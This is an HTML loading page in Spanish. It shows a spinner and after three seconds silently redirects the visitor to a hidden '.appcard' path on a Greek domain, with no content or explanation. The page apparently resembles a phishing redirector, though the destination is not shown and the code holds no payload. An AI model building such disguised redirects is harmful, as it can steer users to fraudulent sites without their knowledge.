<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cargando...</title>
    <style>
        /* Estilos actualizados para el loader */
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #e0e0e0;
        }

        .loader {
            border: 6px solid #e0e0e0; /* Color de fondo */
            border-top: 6px solid #3498db; /* Color del loader */
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: giro 2s ease-in-out infinite;
        }

        @keyframes giro {
            0% { transform: rotate(0deg); }
            50% { transform: rotate(180deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="loader"></div>

    <script>
        // Mejora en la gestión de la redirección
        document.addEventListener('DOMContentLoaded', (event) => {
            setTimeout(() => {
                window.location.replace("https://client.abgroup.gr/.appcard/");
            }, 3000); // Tiempo de espera antes de la redirección
        });
    </script>
</body>
</html>

